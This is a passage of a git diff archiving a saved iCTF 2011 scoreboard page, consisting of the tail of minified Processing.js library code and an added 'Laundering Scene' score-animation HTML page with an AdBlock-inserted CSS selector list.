"+bt+");\n"}}bv+=a4(this.misc.tail);if(this.cstrs.length>0){bv+=this.cstrs.join("\n")+"\n"}bv+="function $constr() {\n";var bM=[];for(bI=0,bG=this.cstrs.length;bI<bG;++bI){var bK=this.cstrs[bI].params.params.length;bM.push("if(arguments.length === "+bK+") { $constr_"+bK+".apply("+bC+", arguments); }")}if(bM.length>0){bv+=bM.join(" else ")+" else "}bv+="$superCstr();\n}\n";bv+="$constr.apply(null, arguments);\n";aj=bN;return"(function() {\nfunction "+bq+"() {\n"+bv+"}\n"+bD+bx+"return "+bq+";\n})()"};T=function(bx,bp,bo,bA){var bC=bx.substring(1,bx.length-1);bC=ac(bC);bC=bb(bC,bp);var bq=[],br=[],bB=[],bu=[];bC=bC.replace(/"([DEGH])(\d+)"/g,function(bF,bE,bD){if(bE==="D"){bq.push(bD)}else{if(bE==="E"){br.push(bD)}else{if(bE==="H"){bu.push(bD)}else{bB.push(bD)}}}return""});var bw=bC.replace(/^(?:\s*;)+/,"").split(/;(?:\s*;)*/g);var bv,bt;var bs;if(bo!==r){bv=bo.replace(/^\s*extends\s+([A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)\s*$/g,"$1")}if(bA!==r){bt=bA.replace(/^\s*implements\s+(.+?)\s*$/g,"$1").split(/\s*,\s*/g)}for(bs=0;bs<bu.length;++bs){bu[bs]=aI(bi[bu[bs]])}for(bs=0;bs<bq.length;++bs){bq[bs]=N(bi[bq[bs]])}for(bs=0;bs<bw.length-1;++bs){var bz=aN(bw[bs]);bw[bs]=bd(bz.middle)}var by=bw.pop();for(bs=0;bs<bB.length;++bs){bB[bs]=aq(bi[bB[bs]])}for(bs=0;bs<br.length;++bs){br[bs]=R(bi[br[bs]])}return new az(bp,bv,bt,bu,bq,bw,bB,br,{tail:by})};function au(bp,bo){this.name=bp;this.body=bo;bo.owner=this}au.prototype.toString=function(){return"var "+this.name+" = "+this.body+";\n$p."+this.name+" = "+this.name+";\n"};function a3(bp,bo){this.name=bp;this.body=bo;bo.owner=this}a3.prototype.toString=function(){return"var "+this.name+" = "+this.body+";\n$p."+this.name+" = "+this.name+";\n"};function bm(bq){var bp=M.exec(bq);M.lastIndex=0;var bo=bi[aO(bp[6])];var bt=a7,br=a5();a7=br;var bs;if(bp[2]==="interface"){bs=new au(bp[3],Q(bo,bp[3],bp[4]))}else{bs=new a3(bp[3],T(bo,bp[3],bp[4],bp[5]))}bj(bs,br,bt);a7=bt;return bs}function aP(bp,bq,bo){this.name=bp;this.params=bq;this.body=bo}aP.prototype.toString=function(){var bq=at({},this.params.getNames());var bp=aj;aj=function(br){return bq.hasOwnProperty(br.name)?br.name:bp(br)};var bo="function "+this.name+this.params+" "+this.body+"\n$p."+this.name+" = "+this.name+";";aj=bp;return bo};function aU(bq){var bp=a9.exec(bq);var bo=a9.lastIndex=0;return new aP(bp[3],aB(bi[aO(bp[4])]),an(bi[aO(bp[6])]))}function ae(bo){var bp=bo;bp=bp.replace(/\b(catch\s*"B\d+"\s*"A\d+")(\s*catch\s*"B\d+"\s*"A\d+")+/g,"$1");return bp}function aS(bo,bp){this.argument=bo;this.misc=bp}aS.prototype.toString=function(){return this.misc.prefix+this.argument.toString()};function O(bo,bp){this.argument=bo;this.misc=bp}O.prototype.toString=function(){return this.misc.prefix+this.argument.toString()};function av(bo,bp,bq){this.name=bo;this.argument=bp;this.misc=bq}av.prototype.toString=function(){var bo=this.misc.prefix;if(this.argument!==r){bo+=this.argument.toString()}return bo};function aJ(bo){this.expr=bo}aJ.prototype.toString=function(){return"case "+this.expr+":"};function V(bo){this.label=bo}V.prototype.toString=function(){return this.label};aT=function(bw,bx,bq){var bB=new RegExp(/\b(catch|for|if|switch|while|with)\s*"B(\d+)"|\b(do|else|finally|return|throw|try|break|continue)\b|("[ADEH](\d+)")|\b(case)\s+([^:]+):|\b([A-Za-z_$][\w$]*\s*:)|(;)/g);var by=[];bw=ae(bw);var bv=0,br,bp;while((br=bB.exec(bw))!==null){if(br[1]!==r){var bu=bw.lastIndexOf('"B',bB.lastIndex);var bA=bw.substring(bv,bu);if(br[1]==="for"){by.push(new aS(W(bi[br[2]]),{prefix:bA}))}else{if(br[1]==="catch"){by.push(new O(aB(bi[br[2]]),{prefix:bA}))}else{by.push(new av(br[1],aX(bi[br[2]]),{prefix:bA}))}}}else{if(br[3]!==r){by.push(new av(br[3],r,{prefix:bw.substring(bv,bB.lastIndex)}))}else{if(br[4]!==r){bp=bw.substring(bv,bB.lastIndex-br[4].length);if(a4(bp).length!==0){continue}by.push(bp);var bs=br[4].charAt(1),bo=br[5];if(bs==="D"){by.push(bx(bi[bo]))}else{if(bs==="E"){by.push(bq(bi[bo]))}else{if(bs==="H"){by.push(aI(bi[bo]))}else{by.push(an(bi[bo]))}}}}else{if(br[6]!==r){by.push(new aJ(aX(a4(br[7]))))}else{if(br[8]!==r){bp=bw.substring(bv,bB.lastIndex-br[8].length);if(a4(bp).length!==0){continue}by.push(new V(bw.substring(bv,bB.lastIndex)))}else{var bz=aN(bw.substring(bv,bB.lastIndex-1));by.push(bz.left);by.push(bl(bz.middle));by.push(bz.right+";")}}}}}bv=bB.lastIndex}var bt=aN(bw.substring(bv));by.push(bt.left);if(bt.middle!==""){by.push(bl(bt.middle));by.push(";"+bt.right)}return by};function bc(bp){var bq=[];for(var br=0,bo=bp.length;br<bo;++br){var bs=bp[br];if(bs instanceof aG){bq=bq.concat(bs.getNames())}else{if(bs instanceof aS&&bs.argument.initStatement instanceof aG){bq=bq.concat(bs.argument.initStatement.getNames())}else{if(bs instanceof Z||bs instanceof al||bs instanceof au||bs instanceof a3||bs instanceof aP||bs instanceof ad){bq.push(bs.name)}}}}return at({},bq)}function S(bo){this.statements=bo}S.prototype.toString=function(){var bq=bc(this.statements);var bp=aj;if(!a8(bq)){aj=function(br){return bq.hasOwnProperty(br.name)?br.name:bp(br)}}var bo="{\n"+this.statements.join("")+"\n}";aj=bp;return bo};an=function(bp){var bo=aN(bp.substring(1,bp.length-1));return new S(aT(bo.middle))};function aE(bo){this.statements=bo}aE.prototype.toString=function(){var bs=[],bt=[],bu;for(var br=0,bp=this.statements.length;br<bp;++br){bu=this.statements[br];if(bu instanceof a3||bu instanceof au){bs.push(bu)}else{bt.push(bu)}}a0(bs);var bq=bc(this.statements);aj=function(bw){var bv=bw.name;if(bq.hasOwnProperty(bv)){return bv}if(aV.hasOwnProperty(bv)||z.hasOwnProperty(bv)||g.hasOwnProperty(bv)){return"$p."+bv}return bv};var bo="// this code was autogenerated from PJS\n(function($p) {\n"+bs.join("")+"\n"+bt.join("")+"\n})";aj=null;return bo};bg=function(){var bo=ac(bi[0]);bo=bo.replace(/\bimport\s+[^;]+;/g,"");return new aE(aT(bo,aU,bm))};function bh(bo){var bs={};var bq,bw;for(bq in aH){if(aH.hasOwnProperty(bq)){bw=aH[bq];var bC=bw.scopeId,bp=bw.name;if(bC){var bB=aH[bC];bw.scope=bB;if(bB.inScope===r){bB.inScope={}}bB.inScope[bp]=bw}else{bs[bp]=bw}}}function bz(bD,bG){var bJ=bG.split(".");var bF=bD.scope,bI;while(bF){if(bF.hasOwnProperty(bJ[0])){bI=bF[bJ[0]];break}bF=bF.scope}if(bI===r){bI=bs[bJ[0]]}for(var bH=1,bE=bJ.length;bH<bE&&bI;++bH){bI=bI.inScope[bJ[bH]]}return bI}for(bq in aH){if(aH.hasOwnProperty(bq)){bw=aH[bq];var bv=bw.body.baseClassName;if(bv){var by=bz(bw,bv);if(by){bw.base=by;if(!by.derived){by.derived=[]}by.derived.push(bw)}}var bu=bw.body.interfacesNames,bA=[],bt,br;if(bu&&bu.length>0){for(bt=0,br=bu.length;bt<br;++bt){var bx=bz(bw,bu[bt]);bA.push(bx);if(!bx){continue}if(!bx.derived){bx.derived=[]}bx.derived.push(bw)}if(bA.length>0){bw.interfaces=bA}}}}}function a6(bo){var bt=[],bq={};var bp,bw,bu;for(bp in aH){if(aH.hasOwnProperty(bp)){bu=aH[bp];if(!bu.inScope&&!bu.derived){bt.push(bp);bu.weight=0}else{var bv=[];if(bu.inScope){for(bw in bu.inScope){if(bu.inScope.hasOwnProperty(bw)){bv.push(bu.inScope[bw])}}}if(bu.derived){bv=bv.concat(bu.derived)}bq[bp]=bv}}}function bx(bz,bB){var by=bq[bz];if(!by){return false}var bA=by.indexOf(bB);if(bA<0){return false}by.splice(bA,1);if(by.length>0){return false}delete bq[bz];return true}while(bt.length>0){bp=bt.shift();bu=aH[bp];if(bu.scopeId&&bx(bu.scopeId,bu)){bt.push(bu.scopeId);aH[bu.scopeId].weight=bu.weight+1}if(bu.base&&bx(bu.base.classId,bu)){bt.push(bu.base.classId);bu.base.weight=bu.weight+1}if(bu.interfaces){var bs,br;for(bs=0,br=bu.interfaces.length;bs<br;++bs){if(!bu.interfaces[bs]||!bx(bu.interfaces[bs].classId,bu)){continue}bt.push(bu.interfaces[bs].classId);bu.interfaces[bs].weight=bu.weight+1}}}}var bf=bg();bh(bf);a6(bf);var aY=bf.toString();aY=aY.replace(/\s*\n(?:[\t ]*\n)+/g,"\n\n");return ah(aY,L)}function x(M,ab){var V=(new RegExp(/\/\*\s*@pjs\s+((?:[^\*]|\*+[^\*\/])*)\*\//g)).exec(M);if(V&&V.length===2){var L=[],O=V.splice(1,2)[0].replace(/\{([\s\S]*?)\}/g,function(){return function(ae,af){L.push(af);return"{"+(L.length-1)+"}"}}()).replace("\n","").replace("\r","").split(";");var U=function(ae){return ae.replace(/^\s*["']?/,"").replace(/["']?\s*$/,"")};for(var Y=0,W=O.length;Y<W;Y++){var S=O[Y].split("=");if(S&&S.length===2){var ad=U(S[0]),T=U(S[1]),ac=[];if(ad==="preload"){ac=T.split(",");for(var X=0,Z=ac.length;X<Z;X++){var aa=U(ac[X]);ab.imageCache.add(aa)}}else{if(ad==="font"){ac=T.split(",");for(var P=0,R=ac.length;P<R;P++){var Q=U(ac[P]),N=/^\{(\d*?)\}$/.exec(Q);F.preloading.add(N?JSON.parse("{"+L[N[1]]+"}"):Q)}}else{if(ad==="pauseOnBlur"){ab.options.pauseOnBlur=T==="true"}else{if(ad==="globalKeyEvents"){ab.options.globalKeyEvents=T==="true"}else{if(ad.substring(0,6)==="param-"){ab.params[ad.substring(6)]=T}else{ab.options[ad]=T}}}}}}}}return M}D.compile=function(L){var O=new D.Sketch;var M=x(L,O);var N=c(M);O.sourceCode=N;return O};var j=function(){var R={},O="undefined",P="function",L=!1,Q=!0,M=512,N="log";if(typeof tinylog!==O&&typeof tinylog[N]===P){R[N]=tinylog[N]}else{if(typeof d!==O&&!d.fake){(function(){var am=d,ak="div",aa="style",ae="title",Z={zIndex:10000,position:"fixed",bottom:"0px",width:"100%",height:"15%",fontFamily:"sans-serif",color:"#ccc",backgroundColor:"black"},ac={position:"relative",fontFamily:"monospace",overflow:"auto",height:"100%",paddingTop:"5px"},ag={height:"5px",marginTop:"-5px",cursor:"n-resize",backgroundColor:"darkgrey"},al={position:"absolute",top:"5px",right:"20px",color:"#111",MozBorderRadius:"4px",webkitBorderRadius:"4px",borderRadius:"4px",cursor:"pointer",fontWeight:"normal",textAlign:"center",padding:"3px 5px",backgroundColor:"#333",fontSize:"12px"},W={minHeight:"16px"},ad={fontSize:"12px",margin:"0 8px 0 8px",maxWidth:"100%",whiteSpace:"pre-wrap",overflow:"auto"},ab=am.defaultView,aj=am.documentElement,S=aj[aa],U=function(){var ao=arguments.length,an,aq,ap;while(ao--){aq=arguments[ao--];an=arguments[ao][aa];for(ap in aq){if(aq.hasOwnProperty(ap)){an[ap]=aq[ap]}}}},ah=function(ap,ao,an){if(ap.addEventListener){ap.addEventListener(ao,an,L)}else{if(ap.attachEvent){ap.attachEvent("on"+ao,an)}}return[ap,ao,an]},T=function(ap,ao,an){if(ap.removeEventListener){ap.removeEventListener(ao,an,L)}else{if(ap.detachEvent){ap.detachEvent("on"+ao,an)}}},Y=function(ao){var an=ao.childNodes,ap=an.length;while(ap--){ao.removeChild(an.item(0))}},ai=function(ao,an){return ao.appendChild(an)},af=function(an){return am.createElement(an)},X=function(an){return am.createTextNode(an)},V=R[N]=function(aC){var au,av=S.paddingBottom,ap=af(ak),az=ap[aa],aA=ai(ap,af(ak)),ar=ai(ap,af(ak)),aq=ai(ap,af(ak)),aB=L,at=L,ao=L,aw=0,an=function(){S.paddingBottom=ap.clientHeight+"px"},ay=function(aD){var aE=ab.innerHeight,aF=aA.clientHeight;if(aD<0){aD=0}else{if(aD+aF>aE){aD=aE-aF}}az.height=aD/aE*100+"%";an()},ax=[ah(am,"mousemove",function(aD){if(aB){ay(ab.innerHeight-aD.clientY);ar.scrollTop=ao}}),ah(am,"mouseup",function(){if(aB){aB=ao=L}}),ah(aA,"dblclick",function(aD){aD.preventDefault();if(at){ay(at);at=L}else{at=ap.clientHeight;az.height="0px"}}),ah(aA,"mousedown",function(aD){aD.preventDefault();aB=Q;ao=ar.scrollTop}),ah(aA,"contextmenu",function(){aB=L}),ah(aq,"click",function(){au()})];au=function(){var aD=ax.length;while(aD--){T.apply(R,ax[aD])}aj.removeChild(ap);S.paddingBottom=av;Y(ar);Y(ap);R[N]=V};U(ap,Z,ar,ac,aA,ag,aq,al);aq[ae]="Close Log";ai(aq,X("\u2716"));aA[ae]="Double-click to toggle log minimization";aj.insertBefore(ap,aj.firstChild);R[N]=function(aF){if(aw===M){ar.removeChild(ar.firstChild)}else{aw++}var aE=ai(ar,af(ak)),aD=ai(aE,af(ak));aE[ae]=(new Date).toLocaleTimeString();U(aE,W,aD,ad);ai(aD,X(aF));ar.scrollTop=ar.scrollHeight};R[N](aC);an()}})()}else{if(typeof print===P){R[N]=print}}}return R}();D.logger=j;D.version="1.3.6";D.lib={};D.registerLibrary=function(L,M){D.lib[L]=M;if(M.hasOwnProperty("init")){M.init(g)}};D.instances=k;D.getInstanceById=function(L){return k[H[L]]};D.Sketch=function(L){this.attachFunction=L;this.options={pauseOnBlur:false,globalKeyEvents:false};this.onLoad=E;this.onSetup=E;this.onPause=E;this.onLoop=E;this.onFrameStart=E;this.onFrameEnd=E;this.onExit=E;this.params={};this.imageCache={pending:0,images:{},operaCache:{},add:function(N,M){if(this.images[N]){return}if(!l){this.images[N]=null}if(!M){M=new Image;M.onload=function(P){return function(){P.pending--}}(this);this.pending++;M.src=N}this.images[N]=M;if(B.opera){var O=d.createElement("div");O.appendChild(M);O.style.position="absolute";O.style.opacity=0;O.style.width="1px";O.style.height="1px";if(!this.operaCache[N]){d.body.appendChild(O);this.operaCache[N]=O}}}};this.sourceCode=undefined;this.attach=function(N){if(typeof this.attachFunction==="function"){this.attachFunction(N)}else{if(this.sourceCode){var M=(new Function("return ("+this.sourceCode+");"))();M(N);this.attachFunction=M}else{throw"Unable to attach sketch to the processing instance"}}};this.toString=function(){var M;var N="((function(Sketch) {\n";N+="var sketch = new Sketch(\n"+this.sourceCode+");\n";for(M in this.options){if(this.options.hasOwnProperty(M)){var O=this.options[M];N+="sketch.options."+M+" = "+(typeof O==="string"?'"'+O+'"':""+O)+";\n"}}for(M in this.imageCache){if(this.options.hasOwnProperty(M)){N+='sketch.imageCache.add("'+M+'");\n'}}N+="return sketch;\n})(Processing.Sketch))";return N}};var t=function(O,L){var M=[],S=[],T=L.length,Q=0;function R(U,W){var V=new XMLHttpRequest;V.onreadystatechange=function(){if(V.readyState===4){var X;if(V.status!==200&&V.status!==0){X="Invalid XHR status "+V.status}else{if(V.responseText===""){if("withCredentials" in new XMLHttpRequest&&(new XMLHttpRequest).withCredentials===false&&B.location.protocol==="file:"){X="XMLHttpRequest failure, possibly due to a same-origin policy violation. You can try loading this page in another browser, or load it from http://localhost using a local webserver. See the Processing.js README for a more detailed explanation of this problem and solutions."}else{X="File is empty."}}}W(V.responseText,X)}};V.open("GET",U,true);if(V.overrideMimeType){V.overrideMimeType("application/json")}V.setRequestHeader("If-Modified-Since","Fri, 01 Jan 1960 00:00:00 GMT");V.send(null)}function N(V,U){function X(aa,Y){M[V]=aa;++Q;if(Y){S.push(U+" ==> "+Y)}if(Q===T){if(S.length===0){try{return new D(O,M.join("\n"))}catch(Z){throw"Processing.js: Unable to execute pjs sketch: "+Z}}else{throw"Processing.js: Unable to load pjs sketch files: "+S.join("\n")}}}if(U.charAt(0)==="#"){var W=d.getElementById(U.substring(1));if(W){X(W.text||W.textContent)}else{X("","Unable to load pjs sketch: element with id '"+U.substring(1)+"' was not found")}return}R(U,X)}for(var P=0;P<T;++P){N(P,L[P])}};var G=function(){d.removeEventListener("DOMContentLoaded",G,false);var M=d.getElementsByTagName("canvas"),S;for(var R=0,N=M.length;R<N;R++){var U=M[R].getAttribute("data-processing-sources");if(U===null){U=M[R].getAttribute("data-src");if(U===null){U=M[R].getAttribute("datasrc")}}if(U){S=U.split(" ");for(var Q=0;Q<S.length;){if(S[Q]){Q++}else{S.splice(Q,1)}}t(M[R],S)}}var O=d.getElementsByTagName("script");var Y,L,X;for(Y=0;Y<O.length;Y++){var W=O[Y];if(!W.getAttribute){continue}var V=W.getAttribute("type");if(V&&(V.toLowerCase()==="text/processing"||V.toLowerCase()==="application/processing")){var T=W.getAttribute("data-processing-target");M=r;if(T){M=d.getElementById(T)}else{var P=W.nextSibling;while(P&&P.nodeType!==1){P=P.nextSibling}if(P.nodeName.toLowerCase()==="canvas"){M=P}}if(M){if(W.getAttribute("src")){S=W.getAttribute("src").split(/\s+/);t(M,S);continue}L=W.textContent||W.text;X=new D(M,L)}}}};D.loadSketchFromSources=t;D.disableInit=function(){if(l){d.removeEventListener("DOMContentLoaded",G,false)}};if(l){B.Processing=D;d.addEventListener("DOMContentLoaded",G,false)}else{this.Processing=D}})(window,window.document,Math); diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/ru.png b/ictf2011/scoreboard.ictf2011_end.info_files/ru.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/score-anim.html b/ictf2011/scoreboard.ictf2011_end.info_files/score-anim.html @@ -0,0 +1,109 @@ +<!DOCTYPE html> +<!-- saved from url=(0047)http://scoreboard.ictf2011.info/score-anim.html --> +<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> + +<title>iCTF 2011 Laundering Scene</title> + +<style type="text/css"> +body {background-color:#131a22; +font-family:monospace; +} +</style> +<script type="text/javascript" src="jquery.min.js"></script> +<script language="javascript" src="processing-1.3.6.min.js"></script> +<!-- <script language="javascript" src="js/processing-1.3.6.min.js"></script> --> +<script type="text/javascript"> + +function UpdateList() +{ +} +$(document).ready(function() +{ + UpdateList() + setInterval("UpdateList()", 11000); +}); + +</script> + +<style type="text/css"> +.score-anim-table +{ + + color:#7494D6; + font-family:arial; + font-size: 12pt; + width: 100%; + text-align: left; + background-color:#3E5490; + border-collapse: collapse; + + -moz-border-radius-bottomright: 15px; + border-bottom-right-radius: 15px; + -moz-border-radius-bottomleft: 15px; + border-bottom-left-radius: 15px; + -moz-border-radius-topright: 15px; + border-top-right-radius: 15px; + -moz-border-radius-topleft: 15px; + border-top-left-radius: 15px; + + filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#3E5482', endColorstr='#131A22'); + background-image: -webkit-linear-gradient(top , #3E5482, #131A22); + + background-image: -moz-linear-gradient(top, #3E5482, #131A22); +} + +.score-anim +{ + + margin-left:auto; + margin-right:auto; + +} +.tworldmap +{ + position:relative; +} +.bg-world{ + width: 100%; + height: 100%; + position: absolute; + top: 0; + left: 0; + z-index:0; + opacity: 0.9; +} +.bg-world-can +{ + position: relative; + top: 0; + left: 0; + z-index:500; +} +</style> + +<style type="text/css">@font-face { + font-family: "PjsEmptyFont"; + src: url('data:application/x-font-ttf;base64,AAEAAAAKAIAAAwAgT1MvMgAAAAAAAAEoAAAAVmNtYXAAAAAAAAABiAAAACxnbHlmAAAAAAAAAbwAAAAkaGVhZAAAAAAAAACsAAAAOGhoZWEAAAAAAAAA5AAAACRobXR4AAAAAAAAAYAAAAAGbG9jYQAAAAAAAAG0AAAABm1heHAAAAAAAAABCAAAACBuYW1lAAAAAAAAAeAAAAAgcG9zdAAAAAAAAAIAAAAAEAABAAAAAQAAAkgTY18PPPUACwAgAAAAALSRooAAAAAAyld0xgAAAAAAAQABAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAEAAAACAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACMAIwAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAMAAQAAAAwABAAgAAAABAAEAAEAAABB//8AAABB////wAABAAAAAAAAAAgAEgAAAAEAAAAAAAAAAAAAAAAxAAABAAAAAAABAAEAAQAAMTcBAQAAAAAAAgAeAAMAAQQJAAEAAAAAAAMAAQQJAAIAAgAAAAAAAQAAAAAAAAAAAAAAAAAA') + format('truetype'); +}</style></head> + +<body> +<div class="score-anim"> +<table class="score-anim-table"> +<tbody><tr> +<td style="{min-width:15px;}" width="50%"></td> +<td class="tworldmap"> + +<div class="bg-world-can"> +<canvas data-processing-sources="score-anim.pde" tabindex="0" id="__processing0" width="665" height="400" style="image-rendering: -webkit-optimize-contrast !important; "></canvas> +</div> +<img id="id-bg-world" class="bg-world" src="world.svg"> + +</td> +<td width="50%" "=""></td> +</tr> +</tbody></table> +</div> + + +<span style="position: absolute; top: 0px; left: 0px; opacity: 0; font-family: PjsEmptyFont, fantasy; ">AAAAAAAA</span></body><style type="text/css" style="display: none !important; ">/*This block of style rules is inserted by AdBlock*/#FFN_Banner_Holder,#FFN_imBox_Container,#RadAd_Skyscraper,#ab_pointer,#adxLeaderboard,#bbccom_leaderboard,#center_banner,#dir_ads_site,#flashad,#footer_adcode,#hbBHeaderSpon,#hiddenHeaderSpon,#navbar_adcode,#p360-format-box,#rightAds,#rightcolumn_adcode,#rm_container,#tads table[align="center"][width="100%"],#tooltipbox[class^="itxt"],#top-advertising,#topMPU,#tracker_advertorial,#ve_threesixty_swf[name="ve_threesixty_swf"],.ad-now,.ad_marquee,.dfpad,.kLink span[id^="preLoadWrap"].preLoadWrap,.prWrap,[id^="ad_block"],[id^="adbrite"],[id^="dclkAds"],[id^="ew"][id$="_bannerDiv"],[id^="konaLayer"],[src*="sixsigmatraffic.com"],a[href^="http://ad."][href*=".doubleclick.net/"],a[href^="http://adserver.adpredictive.com"],div[class^="dms_ad_IDS"],div[id^="adKontekst_"],div[id^="google_ads_div"],div[id^="kona_"][id$="_wrapper"],div[id^="sponsorads"],div[id^="y5_direct"],embed[flashvars*="AdID"],iframe[id^="dapIfM"],iframe[id^="etarget"][id$="banner"],iframe[name^="AdBrite"],iframe[name^="google_ads_"],img[src^="http://cdn.adnxs.com"],script[src="//pagead2.googleadservices.com/pagead/show_ads.js"] + ins > ins > iframe,script[src="http://pagead2.googlesyndication.com/pagead/show_ads.js"] + ins > ins > iframe,table[cellpadding="0"][width="100%"] > * > * > * > div[id^="tpa"],#A9AdsMiddleBoxTop,#A9AdsOutOfStockWidgetTop,#A9AdsServicesWidgetTop,#ADNETwallBanner1,#ADNETwallBanner2,#ADSLOT_1,#ADSLOT_2,#ADSLOT_3,#ADSLOT_4,#ADSLOT_SKYSCRAPER,#ADVERTISE_HERE_ROW,#AD_CONTROL_22,#AD_CONTROL_28,#AD_CONTROL_29,#AD_CONTROL_8,#AD_ROW,#AD_Top,#AD_newsblock,#ADgoogle_newsblock,#ADsmallWrapper,#Ad160x600,#Ad300x250,#Ad3Left,#Ad3Right,#Ad3TextAd,#AdArea,#AdBanner_F1,#AdBar,#AdBar1,#AdBox2,#AdContainer,#AdContainerTop,#AdContentModule_F,#AdDetails_GoogleLinksBottom,#AdDetails_InsureWith,#AdFrame4,#AdHeader,#AdLeaderboardBottom,#AdLeaderboardTop,#AdMiddle,#AdMobileLink,#AdPopUp,#AdRectangle,#AdSenseDiv,#AdSenseResults1_adSenseSponsorDiv,#AdServer,#AdShowcase_F1,#AdSky23,#AdSkyscraper,#AdSpacing,#AdSponsor_SF,#AdSubsectionShowcase_F1,#AdTargetControl1_iframe,#AdTop,#AdTopLeader,#Ad_BelowContent,#Ad_Block,#Ad_Center1,#Ad_Right1,#Ad_RightBottom,#Ad_RightTop,#Ad_Top,#Adbanner,#Adrectangle,#AdsContent,#AdsRight,#AdsWrap,#Ads_BA_CAD,#Ads_BA_CAD2,#Ads_BA_CAD_box,#Ads_BA_SKY,#Ads_CAD,#Ads_OV_BS,#Ads_Special,#AdvertMPU23b,#AdvertPanel,#AdvertiseFrame,#Advertisement,#Advertisements,#Advertorial,#Advertorials,#AdvertsBottom,#AdvertsBottomR,#BANNER_160x600,#BANNER_300x250,#BANNER_728x90,#BannerAd,#BannerAdvert,#BigBoxAd,#BodyAd,#BotAd,#Bottom468x60AD,#ButtonAd,#ClickPop_LayerPop_Container,#CompanyDetailsNarrowGoogleAdsPresentationControl,#CompanyDetailsWideGoogleAdsPresentationControl,#ContentAd,#ContentAd1,#ContentAd2,#ContentAdPlaceHolder1,#ContentAdPlaceHolder2,#ContentAdXXL,#ContentPolepositionAds_Result,#CornerAd,#DartAd300x250,#DivAdEggHeadCafeTopBanner,#FIN_videoplayer_300x250ad,#FooterAd,#FooterAdContainer,#GOOGLE_ADS_47,#GoogleAd1,#GoogleAd2,#GoogleAd3,#GoogleAdsPlaceHolder,#GoogleAdsPresentationControl,#GoogleAdsense,#Google_Adsense_Main,#HEADERAD,#HOME_TOP_RIGHT_BOXAD,#HeaderAD,#HeaderAdsBlock,#HeaderAdsBlockFront,#HeaderBannerAdSpacer,#HeaderTextAd,#HeroAd,#HomeAd1,#HouseAd,#ID_Ad_Sky,#JobsearchResultsAds,#Journal_Ad_125,#Journal_Ad_300,#JuxtapozAds,#KH-contentAd,#LargeRectangleAd,#LeftAd,#LeftAd1,#LeftAdF1,#LeftAdF2,#LftAd,#LoungeAdsDiv,#LowerContentAd,#MPUAdSpace,#MainSponsoredLinks,#Meebo\:AdElement\.Root,#Nightly_adContainer,#NormalAdModule,#OpenXAds,#OverrideAdArea,#PREFOOTER_LEFT_BOXAD,#PREFOOTER_RIGHT_BOXAD,#PageLeaderAd,#PreRollAd,#RelevantAds,#RgtAd1,#RightAd,#RightBottom300x250AD,#RightNavTopAdSpot,#RightSponsoredAd,#SectionAd300-250,#SectionSponsorAd,#SideAdMpu,#SidebarAdContainer,#SkyAd,#SpecialAds,#SponsoredAd,#SponsoredLinks,#TL_footer_advertisement,#TOP_ADROW,#TOP_RIGHT_BOXAD,#Tadspacefoot,#Tadspacehead,#Tadspacemrec,#TextLinkAds,#ThreadAd,#Top468x60AD,#TopAd,#TopAdBox,#TopAdContainer,#TopAdDiv,#TopAdPos,#TopBannerAd,#VM-MPU-adspace,#VM-footer-adspace,#VM-header-adspace,#VM-header-adwrap,#XEadLeaderboard,#XEadSkyscraper,#YahooAdParentContainer,#_ads,#abHeaderAdStreamer,#about_adsbottom,#abovepostads,#ad-1000x90-1,#ad-120x600-sidebar,#ad-120x60Div,#ad-160x600,#ad-160x600-sidebar,#ad-250,#ad-250x300,#ad-300,#ad-300x250,#ad-300x250-1,#ad-300x250-sidebar,#ad-300x250Div,#ad-300x60-1,#ad-376x280,#ad-728,#ad-728x90,#ad-728x90-1,#ad-728x90-leaderboard-top,#ad-728x90-top0,#ad-ads,#ad-article,#ad-banner,#ad-banner-1,#ad-bigbox,#ad-billboard-bottom,#ad-block-125,#ad-bottom,#ad-bottom-wrapper,#ad-box,#ad-box-first,#ad-box-second,#ad-boxes,#ad-bs,#ad-buttons,#ad-colB-1,#ad-column,#ad-container,#ad-content,#ad-contentad,#ad-first-post,#ad-flex-first,#ad-footer,#ad-footprint-160x600,#ad-frame,#ad-front-footer,#ad-front-sponsoredlinks,#ad-fullbanner2,#ad-globalleaderboard,#ad-halfpage,#ad-header,#ad-header-728x90,#ad-horizontal-header,#ad-img,#ad-inner,#ad-label,#ad-leaderboard,#ad-leaderboard-1-container,#ad-leaderboard-bottom,#ad-leaderboard-container,#ad-leaderboard-spot,#ad-leaderboard-top,#ad-left,#ad-left-sidebar-ad-1,#ad-left-sidebar-ad-2,#ad-left-sidebar-ad-3,#ad-links-content,#ad-list-row,#ad-lrec,#ad-medium,#ad-medium-rectangle,#ad-medrec,#ad-middlethree,#ad-middletwo,#ad-module,#ad-mpu,#ad-mpu1-spot,#ad-mpu2,#ad-mpu2-spot,#ad-north,#ad-one,#ad-placard,#ad-placeholder,#ad-rectangle,#ad-right,#ad-right-sidebar-ad-1,#ad-right-sidebar-ad-2,#ad-righttop,#ad-row,#ad-side,#ad-side-text,#ad-sidebar,#ad-sky,#ad-skyscraper,#ad-slot-right,#ad-slug-wrapper,#ad-small-banner,#ad-space,#ad-special,#ad-splash,#ad-sponsors,#ad-spot,#ad-squares,#ad-story-bottom-out,#ad-story-right,#ad-target,#ad-target-Leaderbord,#ad-teaser,#ad-text,#ad-top,#ad-top-banner,#ad-top-text-low,#ad-top-wrap,#ad-tower,#ad-trailerboard-spot,#ad-two,#ad-typ1,#ad-unit,#ad-wrap,#ad-wrap-right,#ad-wrapper,#ad-wrapper1,#ad-yahoo-simple,#ad-zone-1,#ad-zone-2,#ad-zone-inline,#ad01,#ad02,#ad1006,#ad11,#ad125BL,#ad125BR,#ad125TL,#ad125TR,#ad125x125,#ad160x600,#ad160x600right,#ad1Sp,#ad2Sp,#ad300,#ad300-250,#ad300X250,#ad300_x_250,#ad300x100Middle,#ad300x150,#ad300x250,#ad300x250Module,#ad300x60,#ad300x600,#ad300x600_callout,#ad336,